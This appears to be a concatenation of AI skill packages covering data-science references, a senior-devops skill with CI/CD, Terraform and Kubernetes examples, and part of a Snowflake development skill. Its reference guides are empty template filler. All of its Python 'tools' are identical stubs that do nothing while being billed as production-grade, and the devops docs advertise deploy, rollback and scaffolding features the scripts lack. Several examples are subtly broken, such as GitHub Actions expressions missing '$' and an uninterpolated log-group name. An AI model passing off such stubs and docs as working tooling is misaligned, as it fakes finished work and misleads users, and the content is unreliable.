- Deployment platforms
- Monitoring solutions
## Further Reading
- Research papers
- Industry blogs
- Conference talks
- Open source projects
FILE:references/statistical_methods_advanced.md
# Statistical Methods Advanced
## Overview
World-class statistical methods advanced for senior data scientist.
## Core Principles
### Production-First Design
Always design with production in mind:
- Scalability: Handle 10x current load
- Reliability: 99.9% uptime target
- Maintainability: Clear, documented code
- Observability: Monitor everything
### Performance by Design
Optimize from the start:
- Efficient algorithms
- Resource awareness
- Strategic caching
- Batch processing
### Security & Privacy
Build security in:
- Input validation
- Data encryption
- Access control
- Audit logging
## Advanced Patterns
### Pattern 1: Distributed Processing
Enterprise-scale data processing with fault tolerance.
### Pattern 2: Real-Time Systems
Low-latency, high-throughput systems.
### Pattern 3: ML at Scale
Production ML with monitoring and automation.
## Best Practices
### Code Quality
- Comprehensive testing
- Clear documentation
- Code reviews
- Type hints
### Performance
- Profile before optimizing
- Monitor continuously
- Cache strategically
- Batch operations
### Reliability
- Design for failure
- Implement retries
- Use circuit breakers
- Monitor health
## Tools & Technologies
Essential tools for this domain:
- Development frameworks
- Testing libraries
- Deployment platforms
- Monitoring solutions
## Further Reading
- Research papers
- Industry blogs
- Conference talks
- Open source projects
FILE:scripts/experiment_designer.py
#!/usr/bin/env python3
"""
Experiment Designer
Production-grade tool for senior data scientist
"""
import os
import sys
import json
import logging
import argparse
from pathlib import Path
from typing import Dict, List, Optional
from datetime import datetime
logging.basicConfig(
level=logging.INFO,
format='%(asctime)s - %(levelname)s - %(message)s'
)
logger = logging.getLogger(__name__)
class ExperimentDesigner:
"""Production-grade experiment designer"""
def __init__(self, config: Dict):
self.config = config
self.results = {
'status': 'initialized',
'start_time': datetime.now().isoformat(),
'processed_items': 0
}
logger.info(f"Initialized {self.__class__.__name__}")
def validate_config(self) -> bool:
"""Validate configuration"""
logger.info("Validating configuration...")
# Add validation logic
logger.info("Configuration validated")
return True
def process(self) -> Dict:
"""Main processing logic"""
logger.info("Starting processing...")
try:
self.validate_config()
# Main processing
result = self._execute()
self.results['status'] = 'completed'
self.results['end_time'] = datetime.now().isoformat()
logger.info("Processing completed successfully")
return self.results
except Exception as e:
self.results['status'] = 'failed'
self.results['error'] = str(e)
logger.error(f"Processing failed: {e}")
raise
def _execute(self) -> Dict:
"""Execute main logic"""
# Implementation here
return {'success': True}
def main():
"""Main entry point"""
parser = argparse.ArgumentParser(
description="Experiment Designer"
)
parser.add_argument('--input', '-i', required=True, help='Input path')
parser.add_argument('--output', '-o', required=True, help='Output path')
parser.add_argument('--config', '-c', help='Configuration file')
parser.add_argument('--verbose', '-v', action='store_true', help='Verbose output')
args = parser.parse_args()
if args.verbose:
logging.getLogger().setLevel(logging.DEBUG)
try:
config = {
'input': args.input,
'output': args.output
}
processor = ExperimentDesigner(config)
results = processor.process()
print(json.dumps(results, indent=2))
sys.exit(0)
except Exception as e:
logger.error(f"Fatal error: {e}")
sys.exit(1)
if __name__ == '__main__':
main()
FILE:scripts/feature_engineering_pipeline.py
#!/usr/bin/env python3
"""
Feature Engineering Pipeline
Production-grade tool for senior data scientist
"""
import os
import sys
import json
import logging
import argparse
from pathlib import Path
from typing import Dict, List, Optional
from datetime import datetime
logging.basicConfig(
level=logging.INFO,
format='%(asctime)s - %(levelname)s - %(message)s'
)
logger = logging.getLogger(__name__)
class FeatureEngineeringPipeline:
"""Production-grade feature engineering pipeline"""
def __init__(self, config: Dict):
self.config = config
self.results = {
'status': 'initialized',
'start_time': datetime.now().isoformat(),
'processed_items': 0
}
logger.info(f"Initialized {self.__class__.__name__}")
def validate_config(self) -> bool:
"""Validate configuration"""
logger.info("Validating configuration...")
# Add validation logic
logger.info("Configuration validated")
return True
def process(self) -> Dict:
"""Main processing logic"""
logger.info("Starting processing...")
try:
self.validate_config()
# Main processing
result = self._execute()
self.results['status'] = 'completed'
self.results['end_time'] = datetime.now().isoformat()
logger.info("Processing completed successfully")
return self.results
except Exception as e:
self.results['status'] = 'failed'
self.results['error'] = str(e)
logger.error(f"Processing failed: {e}")
raise
def _execute(self) -> Dict:
"""Execute main logic"""
# Implementation here
return {'success': True}
def main():
"""Main entry point"""
parser = argparse.ArgumentParser(
description="Feature Engineering Pipeline"
)
parser.add_argument('--input', '-i', required=True, help='Input path')
parser.add_argument('--output', '-o', required=True, help='Output path')
parser.add_argument('--config', '-c', help='Configuration file')
parser.add_argument('--verbose', '-v', action='store_true', help='Verbose output')
args = parser.parse_args()
if args.verbose:
logging.getLogger().setLevel(logging.DEBUG)
try:
config = {
'input': args.input,
'output': args.output
}
processor = FeatureEngineeringPipeline(config)
results = processor.process()
print(json.dumps(results, indent=2))
sys.exit(0)
except Exception as e:
logger.error(f"Fatal error: {e}")
sys.exit(1)
if __name__ == '__main__':
main()
FILE:scripts/model_evaluation_suite.py
#!/usr/bin/env python3
"""
Model Evaluation Suite
Production-grade tool for senior data scientist
"""
import os
import sys
import json
import logging
import argparse
from pathlib import Path
from typing import Dict, List, Optional
from datetime import datetime
logging.basicConfig(
level=logging.INFO,
format='%(asctime)s - %(levelname)s - %(message)s'
)
logger = logging.getLogger(__name__)
class ModelEvaluationSuite:
"""Production-grade model evaluation suite"""
def __init__(self, config: Dict):
self.config = config
self.results = {
'status': 'initialized',
'start_time': datetime.now().isoformat(),
'processed_items': 0
}
logger.info(f"Initialized {self.__class__.__name__}")
def validate_config(self) -> bool:
"""Validate configuration"""
logger.info("Validating configuration...")
# Add validation logic
logger.info("Configuration validated")
return True
def process(self) -> Dict:
"""Main processing logic"""
logger.info("Starting processing...")
try:
self.validate_config()
# Main processing
result = self._execute()
self.results['status'] = 'completed'
self.results['end_time'] = datetime.now().isoformat()
logger.info("Processing completed successfully")
return self.results
except Exception as e:
self.results['status'] = 'failed'
self.results['error'] = str(e)
logger.error(f"Processing failed: {e}")
raise
def _execute(self) -> Dict:
"""Execute main logic"""
# Implementation here
return {'success': True}
def main():
"""Main entry point"""
parser = argparse.ArgumentParser(
description="Model Evaluation Suite"
)
parser.add_argument('--input', '-i', required=True, help='Input path')
parser.add_argument('--output', '-o', required=True, help='Output path')
parser.add_argument('--config', '-c', help='Configuration file')
parser.add_argument('--verbose', '-v', action='store_true', help='Verbose output')
args = parser.parse_args()
if args.verbose:
logging.getLogger().setLevel(logging.DEBUG)
try:
config = {
'input': args.input,
'output': args.output
}
processor = ModelEvaluationSuite(config)
results = processor.process()
print(json.dumps(results, indent=2))
sys.exit(0)
except Exception as e:
logger.error(f"Fatal error: {e}")
sys.exit(1)
if __name__ == '__main__':
main()
DevOps toàn diện: CI/CD, tự động hóa hạ tầng, container hóa, cloud AWS/GCP/Azure, IaC, tự động triển khai và giám sát.
---
name: "senior-devops"
description: Comprehensive DevOps skill for CI/CD, infrastructure automation, containerization, and cloud platforms (AWS, GCP, Azure). Includes pipeline setup, infrastructure as code, deployment automation, and monitoring. Use when setting up pipelines, deploying applications, managing infrastructure, implementing monitoring, or optimizing deployment processes.
---
# Senior Devops
Complete toolkit for senior devops with modern tools and best practices.
## Quick Start
### Main Capabilities
This skill provides three core capabilities through automated scripts:
```bash
# Script 1: Pipeline Generator — scaffolds CI/CD pipelines for GitHub Actions or CircleCI
python scripts/pipeline_generator.py ./app --platform=github --stages=build,test,deploy
# Script 2: Terraform Scaffolder — generates and validates IaC modules for AWS/GCP/Azure
python scripts/terraform_scaffolder.py ./infra --provider=aws --module=ecs-service --verbose
# Script 3: Deployment Manager — orchestrates container deployments with rollback support
python3 scripts/deployment_manager.py ./deploy --verbose --json
```
## Core Capabilities
### 1. Pipeline Generator
Scaffolds CI/CD pipeline configurations for GitHub Actions or CircleCI, with stages for build, test, security scan, and deploy.
**Example — GitHub Actions workflow:**
```yaml
# .github/workflows/ci.yml
name: CI/CD Pipeline
on:
push:
branches: [main, develop]
pull_request:
branches: [main]
jobs:
build-and-test:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v4
- name: Set up Node.js
uses: actions/setup-node@v4
with:
node-version: '20'
cache: 'npm'
- run: npm ci
- run: npm run lint
- run: npm test -- --coverage
- name: Upload coverage
uses: codecov/codecov-action@v4
build-docker:
needs: build-and-test
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v4
- name: Build and push image
uses: docker/build-push-action@v5
with:
push: { github.ref == 'refs/heads/main'}
tags: ghcr.io/{ github.repository}:{ github.sha}
deploy:
needs: build-docker
if: github.ref == 'refs/heads/main'
runs-on: ubuntu-latest
steps:
- name: Deploy to ECS
run: |
aws ecs update-service \
--cluster production \
--service app-service \
--force-new-deployment
```
**Usage:**
```bash
python scripts/pipeline_generator.py <project-path> --platform=github|circleci --stages=build,test,deploy
```
### 2. Terraform Scaffolder
Generates, validates, and plans Terraform modules. Enforces consistent module structure and runs `terraform validate` + `terraform plan` before any apply.
**Example — AWS ECS service module:**
```hcl
# modules/ecs-service/main.tf
resource "aws_ecs_task_definition" "app" {
family = var.service_name
requires_compatibilities = ["FARGATE"]
network_mode = "awsvpc"
cpu = var.cpu
memory = var.memory
container_definitions = jsonencode([{
name = var.service_name
image = var.container_image
essential = true
portMappings = [{
containerPort = var.container_port
protocol = "tcp"
}]
environment = [for k, v in var.env_vars : { name = k, value = v }]
logConfiguration = {
logDriver = "awslogs"
options = {
awslogs-group = "/ecs/var.service_name"
awslogs-region = var.aws_region
awslogs-stream-prefix = "ecs"
}
}
}])
}
resource "aws_ecs_service" "app" {
name = var.service_name
cluster = var.cluster_id
task_definition = aws_ecs_task_definition.app.arn
desired_count = var.desired_count
launch_type = "FARGATE"
network_configuration {
subnets = var.private_subnet_ids
security_groups = [aws_security_group.app.id]
assign_public_ip = false
}
load_balancer {
target_group_arn = aws_lb_target_group.app.arn
container_name = var.service_name
container_port = var.container_port
}
}
```
**Usage:**
```bash
python scripts/terraform_scaffolder.py <target-path> --provider=aws|gcp|azure --module=ecs-service|gke-deployment|aks-service [--verbose]
```
### 3. Deployment Manager
Orchestrates deployments with blue/green or rolling strategies, health-check gates, and automatic rollback on failure.
**Example — Kubernetes blue/green deployment (blue-slot specific elements):**
```yaml
# k8s/deployment-blue.yaml
apiVersion: apps/v1
kind: Deployment
metadata:
name: app-blue
labels:
app: myapp
slot: blue # slot label distinguishes blue from green
spec:
replicas: 3
selector:
matchLabels:
app: myapp
slot: blue
template:
metadata:
labels:
app: myapp
slot: blue
spec:
containers:
- name: app
image: ghcr.io/org/app:1.2.3
readinessProbe: # gate: pod must pass before traffic switches
httpGet:
path: /healthz
port: 8080
initialDelaySeconds: 10
periodSeconds: 5
resources:
requests:
cpu: "250m"
memory: "256Mi"
limits:
cpu: "500m"
memory: "512Mi"
```
**Usage:**
```bash
python scripts/deployment_manager.py deploy \
--env=staging|production \
--image=app:1.2.3 \
--strategy=blue-green|rolling \
--health-check-url=https://app.example.com/healthz
python scripts/deployment_manager.py rollback --env=production --to-version=1.2.2
python scripts/deployment_manager.py --analyze --env=production # audit current state
```
## Resources
- Pattern Reference: `references/cicd_pipeline_guide.md` — detailed CI/CD patterns, best practices, anti-patterns
- Workflow Guide: `references/infrastructure_as_code.md` — IaC step-by-step processes, optimization, troubleshooting
- Technical Guide: `references/deployment_strategies.md` — deployment strategy configs, security considerations, scalability
- Tool Scripts: `scripts/` directory
## Development Workflow
### 1. Infrastructure Changes (Terraform)
```bash
# Scaffold or update module
python scripts/terraform_scaffolder.py ./infra --provider=aws --module=ecs-service --verbose
# Validate and plan — review diff before applying
terraform -chdir=infra init
terraform -chdir=infra validate
terraform -chdir=infra plan -out=tfplan
# Apply only after plan review
terraform -chdir=infra apply tfplan
# Verify resources are healthy
aws ecs describe-services --cluster production --services app-service \
--query 'services[0].{Status:status,Running:runningCount,Desired:desiredCount}'
```
### 2. Application Deployment
```bash
# Generate or update pipeline config
python scripts/pipeline_generator.py . --platform=github --stages=build,test,security,deploy
# Build and tag image
docker build -t ghcr.io/org/app:$(git rev-parse --short HEAD) .
docker push ghcr.io/org/app:$(git rev-parse --short HEAD)
# Deploy with health-check gate
python scripts/deployment_manager.py deploy \
--env=production \
--image=app:$(git rev-parse --short HEAD) \
--strategy=blue-green \
--health-check-url=https://app.example.com/healthz
# Verify pods are running
kubectl get pods -n production -l app=myapp
kubectl rollout status deployment/app-blue -n production
# Switch traffic after verification
kubectl patch service app-svc -n production \
-p '{"spec":{"selector":{"slot":"blue"}}}'
```
### 3. Rollback Procedure
```bash
# Immediate rollback via deployment manager
python scripts/deployment_manager.py rollback --env=production --to-version=1.2.2
# Or via kubectl
kubectl rollout undo deployment/app -n production
kubectl rollout status deployment/app -n production
# Verify rollback succeeded
kubectl get pods -n production -l app=myapp
curl -sf https://app.example.com/healthz || echo "ROLLBACK FAILED — escalate"
```
## Multi-Cloud Cross-References
Use these companion skills for cloud-specific deep dives:
| Skill | Cloud | Use When |
|-------|-------|----------|
| **aws-solution-architect** | AWS | ECS/EKS, Lambda, VPC design, cost optimization |
| **azure-cloud-architect** | Azure | AKS, App Service, Virtual Networks, Azure DevOps |
| **gcp-cloud-architect** | GCP | GKE, Cloud Run, VPC, Cloud Build *(coming soon)* |
**Multi-cloud vs single-cloud decision:**
- **Single-cloud** (default) — lower operational complexity, deeper managed-service integration, better cost leverage with committed-use discounts
- **Multi-cloud** — required when mandated by compliance/data residency, acquiring companies on different clouds, or needing best-of-breed services across providers (e.g., AWS for compute + GCP for ML)
- **Hybrid** — on-prem + cloud; use when regulated workloads must stay on-prem while burst/non-sensitive workloads run in the cloud
> Start single-cloud. Add a second cloud only when there is a concrete business or compliance driver — not for theoretical redundancy.
---
## Cloud-Agnostic IaC
### Terraform / OpenTofu (Default Choice)
Terraform (or its open-source fork OpenTofu) is the recommended IaC tool for most teams:
- Single language (HCL) across AWS, Azure, GCP, and 3,000+ providers
- State management with remote backends (S3, GCS, Azure Blob)
- Plan-before-apply workflow prevents drift surprises
- Cross-reference **terraform-patterns** for module structure, state isolation, and CI/CD integration
### Pulumi (Programming Language IaC)
Choose Pulumi when the team strongly prefers TypeScript, Python, Go, or C# over HCL:
- Full programming language — loops, conditionals, unit tests native
- Same cloud provider coverage as Terraform
- Easier onboarding for dev teams that resist learning HCL
### When to Use Cloud-Native IaC
| Tool | Use When |
|------|----------|
| **CloudFormation** | AWS-only shop; need native AWS support (StackSets, Service Catalog) |
| **Bicep** | Azure-only shop; simpler syntax than ARM templates |
| **Cloud Deployment Manager** | GCP-only; rare — most GCP teams prefer Terraform |
> **Rule of thumb:** Use Terraform/OpenTofu unless you are 100% committed to a single cloud AND the cloud-native tool offers a feature Terraform cannot replicate (e.g., AWS Service Catalog integration).
---
## Troubleshooting
Check the comprehensive troubleshooting section in `references/deployment_strategies.md`.
FILE:references/cicd_pipeline_guide.md
# Cicd Pipeline Guide
## Overview
This reference guide provides comprehensive information for senior devops.
## Patterns and Practices
### Pattern 1: Best Practice Implementation
**Description:**
Detailed explanation of the pattern.
**When to Use:**
- Scenario 1
- Scenario 2
- Scenario 3
**Implementation:**
```typescript
// Example code implementation
export class Example {
// Implementation details
}
```
**Benefits:**
- Benefit 1
- Benefit 2
- Benefit 3
**Trade-offs:**
- Consider 1
- Consider 2
- Consider 3
### Pattern 2: Advanced Technique
**Description:**
Another important pattern for senior devops.
**Implementation:**
```typescript
// Advanced example
async function advancedExample() {
// Code here
}
```
## Guidelines
### Code Organization
- Clear structure
- Logical separation
- Consistent naming
- Proper documentation
### Performance Considerations
- Optimization strategies
- Bottleneck identification
- Monitoring approaches
- Scaling techniques
### Security Best Practices
- Input validation
- Authentication
- Authorization
- Data protection
## Common Patterns
### Pattern A
Implementation details and examples.
### Pattern B
Implementation details and examples.
### Pattern C
Implementation details and examples.
## Anti-Patterns to Avoid
### Anti-Pattern 1
What not to do and why.
### Anti-Pattern 2
What not to do and why.
## Tools and Resources
### Recommended Tools
- Tool 1: Purpose
- Tool 2: Purpose
- Tool 3: Purpose
### Further Reading
- Resource 1
- Resource 2
- Resource 3
## Conclusion
Key takeaways for using this reference guide effectively.
FILE:references/deployment_strategies.md
# Deployment Strategies
## Overview
This reference guide provides comprehensive information for senior devops.
## Patterns and Practices
### Pattern 1: Best Practice Implementation
**Description:**
Detailed explanation of the pattern.
**When to Use:**
- Scenario 1
- Scenario 2
- Scenario 3
**Implementation:**
```typescript
// Example code implementation
export class Example {
// Implementation details
}
```
**Benefits:**
- Benefit 1
- Benefit 2
- Benefit 3
**Trade-offs:**
- Consider 1
- Consider 2
- Consider 3
### Pattern 2: Advanced Technique
**Description:**
Another important pattern for senior devops.
**Implementation:**
```typescript
// Advanced example
async function advancedExample() {
// Code here
}
```
## Guidelines
### Code Organization
- Clear structure
- Logical separation
- Consistent naming
- Proper documentation
### Performance Considerations
- Optimization strategies
- Bottleneck identification
- Monitoring approaches
- Scaling techniques
### Security Best Practices
- Input validation
- Authentication
- Authorization
- Data protection
## Common Patterns
### Pattern A
Implementation details and examples.
### Pattern B
Implementation details and examples.
### Pattern C
Implementation details and examples.
## Anti-Patterns to Avoid
### Anti-Pattern 1
What not to do and why.
### Anti-Pattern 2
What not to do and why.
## Tools and Resources
### Recommended Tools
- Tool 1: Purpose
- Tool 2: Purpose
- Tool 3: Purpose
### Further Reading
- Resource 1
- Resource 2
- Resource 3
## Conclusion
Key takeaways for using this reference guide effectively.
FILE:references/infrastructure_as_code.md
# Infrastructure As Code
## Overview
This reference guide provides comprehensive information for senior devops.
## Patterns and Practices
### Pattern 1: Best Practice Implementation
**Description:**
Detailed explanation of the pattern.
**When to Use:**
- Scenario 1
- Scenario 2
- Scenario 3
**Implementation:**
```typescript
// Example code implementation
export class Example {
// Implementation details
}
```
**Benefits:**
- Benefit 1
- Benefit 2
- Benefit 3
**Trade-offs:**
- Consider 1
- Consider 2
- Consider 3
### Pattern 2: Advanced Technique
**Description:**
Another important pattern for senior devops.
**Implementation:**
```typescript
// Advanced example
async function advancedExample() {
// Code here
}
```
## Guidelines
### Code Organization
- Clear structure
- Logical separation
- Consistent naming
- Proper documentation
### Performance Considerations
- Optimization strategies
- Bottleneck identification
- Monitoring approaches
- Scaling techniques
### Security Best Practices
- Input validation
- Authentication
- Authorization
- Data protection
## Common Patterns
### Pattern A
Implementation details and examples.
### Pattern B
Implementation details and examples.
### Pattern C
Implementation details and examples.
## Anti-Patterns to Avoid
### Anti-Pattern 1
What not to do and why.
### Anti-Pattern 2
What not to do and why.
## Tools and Resources
### Recommended Tools
- Tool 1: Purpose
- Tool 2: Purpose
- Tool 3: Purpose
### Further Reading
- Resource 1
- Resource 2
- Resource 3
## Conclusion
Key takeaways for using this reference guide effectively.
FILE:scripts/deployment_manager.py
#!/usr/bin/env python3
"""
Deployment Manager
Automated tool for senior devops tasks
"""
import os
import sys
import json
import argparse
from pathlib import Path
from typing import Dict, List, Optional
class DeploymentManager:
"""Main class for deployment manager functionality"""
def __init__(self, target_path: str, verbose: bool = False):
self.target_path = Path(target_path)
self.verbose = verbose
self.results = {}
def run(self) -> Dict:
"""Execute the main functionality"""
print(f"🚀 Running {self.__class__.__name__}...")
print(f"📁 Target: {self.target_path}")
try:
self.validate_target()
self.analyze()
self.generate_report()
print("✅ Completed successfully!")
return self.results
except Exception as e:
print(f"❌ Error: {e}")
sys.exit(1)
def validate_target(self):
"""Validate the target path exists and is accessible"""
if not self.target_path.exists():
raise ValueError(f"Target path does not exist: {self.target_path}")
if self.verbose:
print(f"✓ Target validated: {self.target_path}")
def analyze(self):
"""Perform the main analysis or operation"""
if self.verbose:
print("📊 Analyzing...")
# Main logic here
self.results['status'] = 'success'
self.results['target'] = str(self.target_path)
self.results['findings'] = []
# Add analysis results
if self.verbose:
print(f"✓ Analysis complete: {len(self.results.get('findings', []))} findings")
def generate_report(self):
"""Generate and display the report"""
print("\n" + "="*50)
print("REPORT")
print("="*50)
print(f"Target: {self.results.get('target')}")
print(f"Status: {self.results.get('status')}")
print(f"Findings: {len(self.results.get('findings', []))}")
print("="*50 + "\n")
def main():
"""Main entry point"""
parser = argparse.ArgumentParser(
description="Deployment Manager"
)
parser.add_argument(
'target',
help='Target path to analyze or process'
)
parser.add_argument(
'--verbose', '-v',
action='store_true',
help='Enable verbose output'
)
parser.add_argument(
'--json',
action='store_true',
help='Output results as JSON'
)
parser.add_argument(
'--output', '-o',
help='Output file path'
)
args = parser.parse_args()
tool = DeploymentManager(
args.target,
verbose=args.verbose
)
results = tool.run()
if args.json:
output = json.dumps(results, indent=2)
if args.output:
with open(args.output, 'w') as f:
f.write(output)
print(f"Results written to {args.output}")
else:
print(output)
if __name__ == '__main__':
main()
FILE:scripts/pipeline_generator.py
#!/usr/bin/env python3
"""
Pipeline Generator
Automated tool for senior devops tasks
"""
import os
import sys
import json
import argparse
from pathlib import Path
from typing import Dict, List, Optional
class PipelineGenerator:
"""Main class for pipeline generator functionality"""
def __init__(self, target_path: str, verbose: bool = False):
self.target_path = Path(target_path)
self.verbose = verbose
self.results = {}
def run(self) -> Dict:
"""Execute the main functionality"""
print(f"🚀 Running {self.__class__.__name__}...")
print(f"📁 Target: {self.target_path}")
try:
self.validate_target()
self.analyze()
self.generate_report()
print("✅ Completed successfully!")
return self.results
except Exception as e:
print(f"❌ Error: {e}")
sys.exit(1)
def validate_target(self):
"""Validate the target path exists and is accessible"""
if not self.target_path.exists():
raise ValueError(f"Target path does not exist: {self.target_path}")
if self.verbose:
print(f"✓ Target validated: {self.target_path}")
def analyze(self):
"""Perform the main analysis or operation"""
if self.verbose:
print("📊 Analyzing...")
# Main logic here
self.results['status'] = 'success'
self.results['target'] = str(self.target_path)
self.results['findings'] = []
# Add analysis results
if self.verbose:
print(f"✓ Analysis complete: {len(self.results.get('findings', []))} findings")
def generate_report(self):
"""Generate and display the report"""
print("\n" + "="*50)
print("REPORT")
print("="*50)
print(f"Target: {self.results.get('target')}")
print(f"Status: {self.results.get('status')}")
print(f"Findings: {len(self.results.get('findings', []))}")
print("="*50 + "\n")
def main():
"""Main entry point"""
parser = argparse.ArgumentParser(
description="Pipeline Generator"
)
parser.add_argument(
'target',
help='Target path to analyze or process'
)
parser.add_argument(
'--verbose', '-v',
action='store_true',
help='Enable verbose output'
)
parser.add_argument(
'--json',
action='store_true',
help='Output results as JSON'
)
parser.add_argument(
'--output', '-o',
help='Output file path'
)
args = parser.parse_args()
tool = PipelineGenerator(
args.target,
verbose=args.verbose
)
results = tool.run()
if args.json:
output = json.dumps(results, indent=2)
if args.output:
with open(args.output, 'w') as f:
f.write(output)
print(f"Results written to {args.output}")
else:
print(output)
if __name__ == '__main__':
main()
FILE:scripts/terraform_scaffolder.py
#!/usr/bin/env python3
"""
Terraform Scaffolder
Automated tool for senior devops tasks
"""
import os
import sys
import json
import argparse
from pathlib import Path
from typing import Dict, List, Optional
class TerraformScaffolder:
"""Main class for terraform scaffolder functionality"""
def __init__(self, target_path: str, verbose: bool = False):
self.target_path = Path(target_path)
self.verbose = verbose
self.results = {}
def run(self) -> Dict:
"""Execute the main functionality"""
print(f"🚀 Running {self.__class__.__name__}...")
print(f"📁 Target: {self.target_path}")
try:
self.validate_target()
self.analyze()
self.generate_report()
print("✅ Completed successfully!")
return self.results
except Exception as e:
print(f"❌ Error: {e}")
sys.exit(1)
def validate_target(self):
"""Validate the target path exists and is accessible"""
if not self.target_path.exists():
raise ValueError(f"Target path does not exist: {self.target_path}")
if self.verbose:
print(f"✓ Target validated: {self.target_path}")
def analyze(self):
"""Perform the main analysis or operation"""
if self.verbose:
print("📊 Analyzing...")
# Main logic here
self.results['status'] = 'success'
self.results['target'] = str(self.target_path)
self.results['findings'] = []
# Add analysis results
if self.verbose:
print(f"✓ Analysis complete: {len(self.results.get('findings', []))} findings")
def generate_report(self):
"""Generate and display the report"""
print("\n" + "="*50)
print("REPORT")
print("="*50)
print(f"Target: {self.results.get('target')}")
print(f"Status: {self.results.get('status')}")
print(f"Findings: {len(self.results.get('findings', []))}")
print("="*50 + "\n")
def main():
"""Main entry point"""
parser = argparse.ArgumentParser(
description="Terraform Scaffolder"
)
parser.add_argument(
'target',
help='Target path to analyze or process'
)
parser.add_argument(
'--verbose', '-v',
action='store_true',
help='Enable verbose output'
)
parser.add_argument(
'--json',
action='store_true',
help='Output results as JSON'
)
parser.add_argument(
'--output', '-o',
help='Output file path'
)
args = parser.parse_args()
tool = TerraformScaffolder(
args.target,
verbose=args.verbose
)
results = tool.run()
if args.json:
output = json.dumps(results, indent=2)
if args.output:
with open(args.output, 'w') as f:
f.write(output)
print(f"Results written to {args.output}")
else:
print(output)
if __name__ == '__main__':
main()
Viết SQL Snowflake, xây data pipeline với Dynamic Tables, Streams/Tasks, Cortex AI, Snowpark Python, dbt và xử lý lỗi.
---
name: "snowflake-development"
description: "Use when writing Snowflake SQL, building data pipelines with Dynamic Tables or Streams/Tasks, using Cortex AI functions, creating Cortex Agents, writing Snowpark Python, configuring dbt for Snowflake, or troubleshooting Snowflake errors."
---
# Snowflake Development
Snowflake SQL, data pipelines, Cortex AI, and Snowpark Python development. Covers the colon-prefix rule, semi-structured data, MERGE upserts, Dynamic Tables, Streams+Tasks, Cortex AI functions, agent specs, performance tuning, and security hardening.
> Originally contributed by [James Cha-Earley](https://github.com/jamescha-earley) — enhanced and integrated by the claude-skills team.
## Quick Start
```bash
# Generate a MERGE upsert template
python scripts/snowflake_query_helper.py merge --target customers --source staging_customers --key customer_id --columns name,email,updated_at
# Generate a Dynamic Table template
python scripts/snowflake_query_helper.py dynamic-table --name cleaned_events --warehouse transform_wh --lag "5 minutes"
# Generate RBAC grant statements
python scripts/snowflake_query_helper.py grant --role analyst_role --database analytics --schemas public,staging --privileges SELECT,USAGE
```
---
## SQL Best Practices
### Naming and Style
- Use `snake_case` for all identifiers. Avoid double-quoted identifiers -- they force case-sensitive names that require constant quoting.
- Use CTEs (`WITH` clauses) over nested subqueries.
- Use `CREATE OR REPLACE` for idempotent DDL.
- Use explicit column lists -- never `SELECT *` in production. Snowflake's columnar storage scans only referenced columns, so explicit lists reduce I/O.
### Stored Procedures -- Colon Prefix Rule
In SQL stored procedures (BEGIN...END blocks), variables and parameters **must** use the colon `:` prefix inside SQL statements. Without it, Snowflake treats them as column identifiers and raises "invalid identifier" errors.
```sql
-- WRONG: missing colon prefix
SELECT name INTO result FROM users WHERE id = p_id;
-- CORRECT: colon prefix on both variable and parameter
SELECT name INTO :result FROM users WHERE id = :p_id;
```
This applies to DECLARE variables, LET variables, and procedure parameters when used inside SELECT, INSERT, UPDATE, DELETE, or MERGE.
### Semi-Structured Data
- VARIANT, OBJECT, ARRAY for JSON/Avro/Parquet/ORC.
- Access nested fields: `src:customer.name::STRING`. Always cast with `::TYPE`.
- VARIANT null vs SQL NULL: JSON `null` is stored as the string `"null"`. Use `STRIP_NULL_VALUE = TRUE` on load.
- Flatten arrays: `SELECT f.value:name::STRING FROM my_table, LATERAL FLATTEN(input => src:items) f;`
### MERGE for Upserts
```sql
MERGE INTO target t USING source s ON t.id = s.id
WHEN MATCHED THEN UPDATE SET t.name = s.name, t.updated_at = CURRENT_TIMESTAMP()
WHEN NOT MATCHED THEN INSERT (id, name, updated_at) VALUES (s.id, s.name, CURRENT_TIMESTAMP());
```
> See `references/snowflake_sql_and_pipelines.md` for deeper SQL patterns and anti-patterns.
---
## Data Pipelines
### Choosing Your Approach
| Approach | When to Use |
|----------|-------------|
| Dynamic Tables | Declarative transformations. **Default choice.** Define the query, Snowflake handles refresh. |
| Streams + Tasks | Imperative CDC. Use for procedural logic, stored procedure calls, complex branching. |
| Snowpipe | Continuous file loading from cloud storage (S3, GCS, Azure). |
### Dynamic Tables
```sql
CREATE OR REPLACE DYNAMIC TABLE cleaned_events
TARGET_LAG = '5 minutes'
WAREHOUSE = transform_wh
AS
SELECT event_id, event_type, user_id, event_timestamp
FROM raw_events
WHERE event_type IS NOT NULL;
```
Key rules:
- Set `TARGET_LAG` progressively: tighter at the top of the DAG, looser downstream.
- Incremental DTs cannot depend on Full-refresh DTs.
- `SELECT *` breaks on upstream schema changes -- use explicit column lists.
- Views cannot sit between two Dynamic Tables in the DAG.
### Streams and Tasks
```sql
CREATE OR REPLACE STREAM raw_stream ON TABLE raw_events;
CREATE OR REPLACE TASK process_events
WAREHOUSE = transform_wh
SCHEDULE = 'USING CRON 0 */1 * * * America/Los_Angeles'
WHEN SYSTEM$STREAM_HAS_DATA('raw_stream')
AS INSERT INTO cleaned_events SELECT ... FROM raw_stream;
-- Tasks start SUSPENDED. You MUST resume them.
ALTER TASK process_events RESUME;
```
> See `references/snowflake_sql_and_pipelines.md` for DT debugging queries and Snowpipe patterns.
---
## Cortex AI
### Function Reference
| Function | Purpose |
|----------|---------|
| `AI_COMPLETE` | LLM completion (text, images, documents) |
| `AI_CLASSIFY` | Classify text into categories (up to 500 labels) |
| `AI_FILTER` | Boolean filter on text or images |
| `AI_EXTRACT` | Structured extraction from text/images/documents |
| `AI_SENTIMENT` | Sentiment score (-1 to 1) |
| `AI_PARSE_DOCUMENT` | OCR or layout extraction from documents |
| `AI_REDACT` | PII removal from text |
**Deprecated names (do NOT use):** `COMPLETE`, `CLASSIFY_TEXT`, `EXTRACT_ANSWER`, `PARSE_DOCUMENT`, `SUMMARIZE`, `TRANSLATE`, `SENTIMENT`, `EMBED_TEXT_768`.
### TO_FILE -- Common Pitfall
Stage path and filename are **separate** arguments:
```sql
-- WRONG: single combined argument
TO_FILE('@stage/file.pdf')
-- CORRECT: two arguments
TO_FILE('@db.schema.mystage', 'invoice.pdf')
```
### Cortex Agents
Agent specs use a JSON structure with top-level keys: `models`, `instructions`, `tools`, `tool_resources`.
- Use `$spec$` delimiter (not `$$`).
- `models` must be an object, not an array.
- `tool_resources` is a separate top-level key, not nested inside `tools`.
- Tool descriptions are the single biggest factor in agent quality.
> See `references/cortex_ai_and_agents.md` for full agent spec examples and Cortex Search patterns.
